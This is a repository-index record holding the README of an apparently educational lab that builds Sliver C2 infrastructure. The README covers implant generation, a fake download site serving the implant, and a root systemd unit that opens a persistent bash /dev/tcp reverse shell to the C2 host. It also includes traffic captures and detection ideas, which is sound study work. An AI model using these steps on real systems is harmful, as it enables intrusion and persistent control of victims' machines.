{"id":25523760,"url":"https://github.com/mohamedmostafa010/c2lab","last_synced_at":"2026-05-05T04:11:27.718Z","repository":{"id":277542580,"uuid":"932747462","full_name":"MohamedMostafa010/C2Lab","owner":"MohamedMostafa010","description":"C2Lab - A lightweight and customizable Command \u0026 Control (C2) lab using Sliver for testing and analyzing botnet communications, persistence, and network detection techniques.","archived":false,"fork":false,"pushed_at":"2025-03-06T09:53:20.000Z","size":7922,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-21T16:12:00.783Z","etag":null,"topics":["azure","azurerm","botnet","botnet-tool","botnets","c2","c2c","cnc","commandandcontrol","lab","labs","pcap","pcap-analyzer","pcap-files","pcaps","sliver","terraform","wireshark"],"latest_commit_sha":null,"homepage":"","language":"HCL","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MohamedMostafa010.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-02-14T12:55:21.000Z","updated_at":"2025-05-12T16:28:36.000Z","dependencies_parsed_at":null,"dependency_job_id":"b22ade4a-49e9-466a-802f-4233112455f4","html_url":"https://github.com/MohamedMostafa010/C2Lab","commit_stats":null,"previous_names":["mohamedmostafa010/c2lab"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/MohamedMostafa010/C2Lab","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab","tags_url":"https://repos.ecosyste.ms/ap
i/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MohamedMostafa010","download_url":"https://codeload.github.com/MohamedMostafa010/C2Lab/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MohamedMostafa010%2FC2Lab/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32634814,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-04T10:08:07.713Z","status":"online","status_checked_at":"2026-05-05T02:00:06.033Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["azure","azurerm","botnet","botnet-tool","botnets","c2","c2c","cnc","commandandcontrol","lab","labs","pcap","pcap-analyzer","pcap-files","pcaps","sliver","terraform","wireshark"],"created_at":"2025-02-19T19:20:21.620Z","updated_at":"2026-05-05T04:11:27.712Z","avatar_url":"https://github.com/MohamedMostafa010.png","language":"HCL","funding_links":[],"categories":[],"sub_categories":[],"readme":"# C2Lab \n\n- **C2Lab** - A lightweight and customizable **Command \u0026amp; Control (C2) lab using Sliver** for testing and analyzing **botnet communications, persistence, and 
network detection techniques.**\n\n## 🚀 Project Overview\n\n- This lab demonstrates how to set up a **C2 infrastructure using Sliver, deploy bots, establish communication over mTLS, and implement persistence** while capturing network **traffic for analysis.**\n\u003cimg src=\"assets/sliver_framework.jpg\" width=\"400\" alt=\"Sliver C2 Framework Logo\" /\u003e\n\n## 🛠 Features\n\n- **Terraform (IaC) automation** for deploying the **C2 server and botnet machines.**\n- **mTLS-secured C2 communication** over port **443.**\n- **Fake website hosting** for social engineering.\n- **Persistent reverse shell** with a **systemd service.**\n- **PCAP captures** for analyzing C2 and bot interactions.\n- **Detection techniques** for identifying encrypted C2 traffic.\n\n## 📌 Steps Performed\n\n1️⃣ **Infrastructure Deployment**\n- Used Terraform to deploy (as in the picture below; the Terraform scripts are also included in this repo):\n  - C2 Machine\n  - Botnet Machines (2 bots)\n  \u003cimg src=\"assets/Deployed_C2_and_Botnet.png\" width=\"400\" alt=\"Deployed Machines from Azure Dashboard\" /\u003e\n\n2️⃣ **Setting Up the C2 Server**\n- SSH into the C2 machine (the username can be changed in the .tf script)\n  ```sh\n  ssh azureuser@[C2 Machine Public IP Address]\n  ```\n- Installed Sliver\n  ```sh\n  curl https://sliver.sh/install|sudo bash\n  sliver\n  ```\n- Generated an Implant (Malicious Payload), then Created a Listener on Port 443 using mTLS (see the [Multiple Domains/Protocols Section](https://sliver.sh/docs?name=Getting+Started) if you want to use multiple protocols)\n  ```sh\n  sliver \u003e generate --mTLS [C2 Machine Public IP Address] --os linux --arch amd64 --save [Payload Name]\n  chmod +x [Payload File]\n  tar -cvpf [Payload File].tar /path/to/[Payload File]\n  ```\n  \u003cimg src=\"assets/Sliver_Generating_Implant.png\" width=\"500\" alt=\"Sliver Generating Implant (Malicious Payload)\" /\u003e\n\n3️⃣ **Fake Website Hosting (HTML File Included)**\n\n- Created 
a phishing-style HTML page to simulate a real website.\n- **Website Purpose:** The fake website mimics a Software Download Center, designed to appear legitimate while serving a malicious payload.\n- The malicious file **(test_file.tar)** is a compressed archive containing the Sliver implant. The attacker packs the file into a **.tar archive to maintain file permissions**, ensuring that execution privileges remain intact when extracted by the victim.\n  \n   \u003cimg src=\"assets/Test_File.png\" width=\"500\" alt=\"Our Archived Malicious File\" /\u003e\n- Hosted it on the C2 server\n- Transferred the HTML file to **/var/www/html/index.html** on the C2 machine.\n- Transferred our **malicious file test_file.tar** to **/var/www/html/** on the C2 machine as well.\n- Hosted the website using **Apache** by placing it in the default web root directory.\n- Restarted the Apache service using\n  ```sh\n  sudo systemctl restart apache2\n  ```\n- This made the fake website accessible over HTTP.\n\u003cimg src=\"assets/Our_Malicious_Website.png\" width=\"500\" alt=\"Our Malicious Made\" /\u003e\n\n4️⃣ **Establishing the Connection**\n\n- I know this is a very simple trick, but let’s simulate a deceived victim who falls for the fake website. 
The unsuspecting user, thinking they are downloading legitimate software, clicks the Download button or manually retrieves the file using curl:\n  ```sh\n  curl -O http://[C2 Machine Public IP Address]/test_file.tar\n  ```\n- At this point, the victim has downloaded test_file.tar, unaware that the attacker intentionally packed it as a .tar archive to maintain execution permissions when extracted.\n- After downloading, the victim extracts and executes the file:\n  ```sh\n  tar -xvf test_file.tar\n  ./test_file\n  ```\n- This action initiates the C2 connection, allowing the attacker to gain control over the compromised system.\n  \n  \u003cimg src=\"assets/Executing_Malware_on_both.png\" width=\"560\" alt=\"Execution of our Malicious test_file Sample\" /\u003e\n  \u003cimg src=\"assets/Bot_0_Connected.png\" width=\"560\" alt=\"Bot 0 Executed our Malicious File, then Connected Back\" /\u003e\n  \u003cimg src=\"assets/Bot_1_Connected.png\" width=\"560\" alt=\"Bot 1 Executed our Malicious File, then Connected Back\" /\u003e\n  \u003cimg src=\"assets/Sessions.png\" width=\"560\" alt=\"Sessions Sample\" /\u003e\n\n5️⃣ **Persistence Setup**\n- Created a **systemd service (persistence.service)** for a persistent **reverse shell**\n- Configured it to automatically restart upon failure\n- Service Unit File Made (Port Chosen was 7777):\n  ```sh\n  [Unit]\n  Description=Persistence Service\n  After=network.target\n  StartLimitIntervalSec=60  # Reset limit every 60 seconds\n  StartLimitBurst=10        # Allow up to 10 restarts in this period\n  \n  [Service]\n  ExecStart=/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/[C2 Machine Public IP Address]/[Desired Port] 0\u003e\u00261'\n  Restart=always\n  RestartSec=10\n  User=root\n  \n  [Install]\n  WantedBy=multi-user.target\n  ```\n- This service continuously attempts to establish a reverse shell to C2 Machine on port X (7777 was chosen). 
If the process fails, systemd automatically restarts it, ensuring persistence.\n- After creating the service file (/etc/systemd/system/persistence.service), we enable and start it:\n  ```sh\n  sudo systemctl daemon-reload\n  sudo systemctl enable persistence\n  sudo systemctl start persistence\n  ```\n  \u003cimg src=\"assets/Enabling_Persistance_on_Botnet.png\" width=\"560\" alt=\"Asking for a Shell and Making Our Malicious Systemd Service\" /\u003e\n- Each time the attacker's machine runs:\n  ```sh\n  nc -l [Desired Listening Port]\n  ```\n- After a few seconds, the bot will establish a reverse shell connection as the root user due to the persistent systemd service. This ensures that as long as the bot remains online, the attacker can repeatedly regain access whenever they listen on port 7777.\n\n  \u003cimg src=\"assets/Reverse_Shell_Gained.png\" width=\"500\" alt=\"Reverse Shell Gained\" /\u003e\n\n- There are many other ways to gain a persistent **reverse shell**, not just **systemd: cron jobs, kernel implants, or SSH backdoors can also be used.**\n\n6️⃣ **Traffic Capture \u0026 Analysis**\n\n- Captured network traffic using tcpdump/Wireshark **(botnet-vm-0 Private IP Address: 10.2.1.5, botnet-vm-1 Private IP Address: 10.2.1.4, C2 Machine Public IP Address: 13.91.62.40)**:\n  - Bot ➝ C2 (mTLS encrypted session): The bot-vm-0 (with private IP address 10.2.1.5) downloads test_file.tar using an HTTP GET request. Screenshot from **capture_when_downloading_the_malicious_file.pcap**; apply the filter **http.request.method == \"GET\"** to reach the intended packets faster.\n\n    \u003cimg src=\"assets/VM0_Downloading_the_Malicious_File.png\" width=\"1250\" alt=\"VM0 Downloading the Malicious File\" /\u003e\n  - Bot ➝ C2: Executing the Malware (test_file). 
Screenshot from **capture_when_executing_the_malicious_file.pcap**; apply the filter **ip.dst == 13.91.62.40** to reach the intended packets faster.\n    \n    \u003cimg src=\"assets/VM0_Executing_the_Malicious_File.png\" width=\"750\" alt=\"VM0 Executing the Malicious File\" /\u003e\n  - Bot ⟷ C2: After execution, encrypted communication occurs between the bot and C2, where commands and responses are exchanged. Check **capture_from_C2_to_botnet.pcap**.\n  - Bot ➝ C2 (Persistence): A reverse shell connection is established to port 7777. Screenshot from **persistence_shell_on_port_7777.pcap**; apply the filter **tcp.port == 7777** to reach the intended packets faster.\n\n    \u003cimg src=\"assets/VM0_Establishing_the_Reverse_Shell.png\" width=\"1150\" alt=\"VM0 Establishing the Reverse Shell Back to the C2 Machine on Port 7777\" /\u003e\n- **Note:** Since all traffic is encrypted, detection techniques were explored. One key observation is that **Wireshark's \"Resolve Network Addresses\" option** was disabled in these captures, meaning IPs are not automatically translated into their associated domain names. However, enabling this option **(View \u003e Name Resolution \u003e Check Resolve Network Addresses)** reveals that our C2 server resolves to **softwaredownloadcenter.westus.cloudapp.azure.com.** This domain name, while appearing legitimate, could still raise suspicion upon closer inspection, especially in an environment where C2 traffic is actively monitored.\n\n## 🔍 Detection Techniques\n\n- Even though C2 traffic is encrypted (mTLS), potential detection methods include:\n1. **Traffic Pattern Analysis**\n    - Monitor unusual outbound connections from private IPs to an unknown public IP\n    - Look for long-lived TLS connections\n2. **Process Monitoring**\n    - Detect execution of unknown binaries\n    - Monitor systemd services for persistence\n3. **DNS Analysis**\n   - Identify suspicious domain resolution requests from bots\n4. 
**Behavior-Based Rules (SIEM/IDS)**\n   - Write a YARA rule for detecting Sliver implants\n   - Use Suricata/Snort for C2 traffic anomaly detection\n\n## 🔥 Enhancements \u0026 Additions That Can Be Added Later\n\n- Explore **DGA (Domain Generation Algorithms)** to dynamically generate C2 domains.\n- Demonstrate DNS tunneling (**like dnscat2**) for C2 instead of using direct IPs.\n- Implement **HTTP/S-based C2 using custom headers** (e.g., mimicking legitimate traffic).\n\n## 📜 Disclaimer\n- This project is for educational and research purposes only. Any unauthorized use in real-world environments is strictly prohibited.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmohamedmostafa010%2Fc2lab","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmohamedmostafa010%2Fc2lab","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmohamedmostafa010%2Fc2lab/lists"}